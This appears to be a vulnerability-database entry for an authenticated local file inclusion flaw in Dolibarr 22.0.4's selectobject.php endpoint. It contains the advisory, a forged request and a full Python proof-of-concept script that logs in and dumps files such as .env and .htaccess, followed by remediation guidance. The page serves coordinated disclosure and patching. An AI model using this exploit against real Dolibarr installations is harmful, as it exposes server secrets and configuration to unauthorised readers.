Skip to main content

PHP CVE-2026-34036

MEDIUM
PHP Remote File Inclusion (CWE-98)
2026-03-27 https://github.com/Dolibarr/dolibarr
6.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 27, 2026 - 18:30 vuln.today
Patch released
Mar 27, 2026 - 18:30 nvd
Patch available
CVE Published
Mar 27, 2026 - 18:04 nvd
MEDIUM 6.5

DescriptionGitHub Advisory

Authenticated Local File Inclusion (LFI) via selectobject.php leading to sensitive data disclosure

Target

Dolibarr Core (Tested on version 22.0.4)

Summary

A Local File Inclusion (LFI) vulnerability has been discovered in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs…).

Vulnerability Details

The vulnerability is caused by a critical design flaw in /core/ajax/selectobject.php where dynamic file inclusion occurs before any access control checks are performed, combined with a fail-open logic in the core ACL function.

  • Arbitrary File Inclusion BEFORE Authorization: The endpoint parses the objectdesc parameter into a $classpath. If fetchObjectByElement fails (e.g., by providing a fake class like A:conf/.htaccess:0), the application falls back to dol_include_once($classpath) at line 71. At this point, the arbitrary file is included and its content is dumped into the HTTP response buffer. This happens *before* the application checks any user permissions.
  • Access Control Bypass (Fail-Open): At line 102, the application finally attempts to verify permissions by calling restrictedArea(). Because the object creation failed, the $features parameter sent to restrictedArea() is empty (''). Inside security.lib.php, if the $features parameter is empty, the access check block is completely skipped, leaving the $readok variable at 1. Because of this secondary flaw, the script finishes cleanly with an HTTP 200 OK instead of throwing a 403 error.

This allows any authenticated user to bypass ACLs and include files. While PHP files cause a fatal error before their code is displayed, the contents of any text-based file (like .htaccess, .env, .json, .sql) are dumped into the HTTP response before the application crashes.

Steps to Reproduce

  • Log in to the Dolibarr instance with any user account (no specific permissions required).
  • Intercept or manually forge a GET request to the following endpoint:
GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0
  • Observe the HTTP response. The contents of the conf/.htaccess file will be reflected in the response body right before the PHP Fatal Error message.
  • *(Optional)* Run the attached Python PoC to automate the extraction:
python3 poc.py --url http://target.com --username '<username>' --password '<password>' --file conf/.htaccess

Impact

An attacker with minimal access to the CRM can exfiltrate sensitive files from the server. This can lead to the disclosure of environment variables (.env), infrastructure configurations (.htaccess), installed packages versions, or even forgotten logs and database dumps, paving the way for further attacks.

Suggested Mitigation

  • Input Validation & Whitelisting: The $classpath must be strictly validated or whitelisted before being passed to dol_include_once().
  • Execution Flow Correction: The file inclusion logic must never be executed before the user's authorization has been fully verified.
  • Enforce Fail-Secure ACLs: Modify restrictedArea() in core/lib/security.lib.php so that if the $features parameter is empty, access is explicitly denied ($readok = 0) instead of allowed by default.

Disclosure Policy & Assistance

The reporter is committed to coordinated vulnerability disclosure. This vulnerability, along with the provided PoC, will be kept strictly confidential until a patch is released and explicit authorization for public disclosure is given.

Should any further technical details, logs, or testing of the remediation once a patch has been developed be needed, the reporter is available to assist.

Thank you for the time and commitment to securing Dolibarr.

Best Regards, Vincent KHAYAT (cnf409)

Video PoC

https://github.com/user-attachments/assets/4af80050-4329-4c88-8a54-e2b522deb844

PoC Script

python
#!/usr/bin/env python3
"""Dolibarr selectobject.php authenticated LFI PoC"""

import argparse
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

LOGIN_MARKERS = ("Login @", "Identifiant @")
LOGOUT_MARKERS = ("/user/logout.php", "Logout", "Mon tableau de bord")

def request(
    opener, base_url, method, path, params=None, data=None, timeout=15
):
    url = f"{base_url.rstrip('/')}{path}"
    if params:
        url = f"{url}?{urllib.parse.urlencode(params)}"
    payload = urllib.parse.urlencode(data).encode("utf-8") if data else None
    req = urllib.request.Request(url, method=method.upper(), data=payload)
    req.add_header("User-Agent", "dolibarr-lfi-poc/1.0-securitytest-for-dolibarr")
    req.add_header("Accept", "text/html,application/xhtml+xml")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", errors="replace")

def extract_login_token(page):
    for pattern in (
        r'name=["\']token["\']\s+value=["\']([^"\']*)["\']',
        r'name=["\']anti-csrf-newtoken["\']\s+content=["\']([^"\']*)["\']',
    ):
        match = re.search(pattern, page, flags=re.IGNORECASE)
        if match:
            return match.group(1)
    return ""

def looks_authenticated(body):
    return any(marker in body for marker in LOGOUT_MARKERS)

def clean_included_output(body):
    for marker in (
        "<br />\n<b>Warning",
        "<br />\r\n<b>Warning",
        "<br />\n<b>Fatal error",
        "<br />\r\n<b>Fatal error",
    ):
        pos = body.find(marker)
        if pos != -1:
            return body[:pos].rstrip()
    return body.rstrip()

def login(opener, base_url, username, password):
    code, login_page = request(opener, base_url, "GET", "/")
    if code >= 400:
        return False, f"HTTP {code} on login page"
    token = extract_login_token(login_page)
    code, after_login = request(
        opener,
        base_url,
        "POST",
        "/index.php?mainmenu=home",
        data={
            "token": token,
            "actionlogin": "login",
            "loginfunction": "loginfunction",
            "username": username,
            "password": password,
        },
    )
    if code >= 400:
        return False, f"HTTP {code} on login request"
    if looks_authenticated(after_login):
        return True, ""
    code, home = request(opener, base_url, "GET", "/index.php?mainmenu=home")
    if code < 400 and looks_authenticated(home):
        return True, ""
    return False, "Invalid username or password"

def read_file(opener, base_url, relative_path):
    status, body = request(
        opener,
        base_url,
        "GET",
        "/core/ajax/selectobject.php",
        params={
            "outjson": "0",
            "htmlname": "x",
            "objectdesc": f"A:{relative_path}:0",
        },
    )
    if any(marker in body for marker in LOGIN_MARKERS) and not looks_authenticated(body):
        raise RuntimeError("Session expired or not authenticated")
    return status, body, clean_included_output(body)

def parse_args():
    parser = argparse.ArgumentParser(
        description="Authenticated LFI PoC against /core/ajax/selectobject.php (Dolibarr 22.0.4)."
    )
    parser.add_argument(
        "--url",
        default="http://127.0.0.1:8080",
        help="Dolibarr base URL (default: http://127.0.0.1:8080)",
    )
    parser.add_argument("--username", required=True, help="Dolibarr username")
    parser.add_argument("--password", required=True, help="Dolibarr password")
    parser.add_argument(
        "--file",
        dest="target_file",
        required=True,
        help="Target file to read (e.g. conf/.htaccess).",
    )
    return parser.parse_args()

def print_result(path, status, raw, clean):
    print(f"\n[+] HTTP status: {status}")
    print(f"[+] Requested file: {path}")
    print("=" * 80)
    if clean:
        print(html.unescape(clean))
    else:
        print("(No readable output extracted)")
    print("=" * 80)
    if clean != raw.rstrip():
        print("[i] PHP warnings/fatal output were trimmed from display.")

def summarize_error_body(body, limit=1200):
    text = html.unescape(body).strip()
    if not text:
        return "(Empty response body)"
    if len(text) > limit:
        return text[:limit].rstrip() + "\n... [truncated]"
    return text

def main():
    args = parse_args()
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar())
    )
    ok, reason = login(opener, args.url, args.username, args.password)
    if not ok:
        print(f"[!] {reason}")
        return 1
    print("[+] Login successful.")
    try:
        status, raw, clean = read_file(opener, args.url, args.target_file)
        if status >= 400:
            print(f"[!] HTTP {status} while reading target file.")
            print("=" * 80)
            print(summarize_error_body(raw))
            print("=" * 80)
            return 1
        print_result(args.target_file, status, raw, clean)
        return 0
    except Exception as exc:
        print(f"[!] Error: {exc}")
        return 1

if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except KeyboardInterrupt:
        print("\nInterrupted.")
        raise SystemExit(130)

AnalysisAI

Dolibarr Core versions up to 22.0.4 allow authenticated users with minimal privileges to read arbitrary non-PHP files from the server via a Local File Inclusion vulnerability in /core/ajax/selectobject.php. The flaw stems from dynamic file inclusion occurring before authorization checks and a fail-open logic in the access control function, enabling exfiltration of sensitive configuration files, environment variables, and logs. Publicly available exploit code exists, and a vendor patch has been released.

Technical ContextAI

The vulnerability exists in the Dolibarr Core AJAX endpoint /core/ajax/selectobject.php (pkg:composer/dolibarr_dolibarr), which processes the objectdesc parameter to construct a dynamic class path passed to dol_include_once() at line 71. The root cause is CWE-98 (Remote File Inclusion), compounded by improper sequencing of authorization checks. When fetchObjectByElement fails due to a malformed objectdesc parameter (e.g., A:conf/.htaccess:0), the application falls back to raw file inclusion before the restrictedArea() access control check at line 102. The security.lib.php restrictedArea() function contains a fail-open flaw: when the features parameter is empty (which occurs when the object fetch fails), the access control block is skipped entirely, leaving the readok variable set to 1, effectively granting access. This combination of execution order and fail-open ACL logic allows arbitrary file disclosure of text-based files (.env, .htaccess, .json, .sql, logs) in the HTTP response before PHP fatal errors prevent code execution.

RemediationAI

Upgrade Dolibarr Core to a patched version released after the upstream commit 743c22e57c0b2a017d6b92bec865d71ce6177a6a (see vendor advisory at https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r for the specific release version containing the fix). The patch implements three key corrections: strict input validation and whitelisting of the objectdesc parameter before file inclusion, reordering of execution flow to ensure authorization checks occur before any file inclusion logic, and modification of restrictedArea() to enforce fail-secure semantics by denying access when the features parameter is empty rather than defaulting to allow. Until patching is completed, apply compensating controls by restricting network access to /core/ajax/selectobject.php to trusted internal subnets via reverse proxy or WAF rules, enforcing role-based access control at the application level to minimize the number of authenticated users, and implementing file access monitoring to detect suspicious .env and configuration file reads. Additionally, ensure sensitive files are not stored in the web root and rotate all secrets found in accessible configuration files.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-34036 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy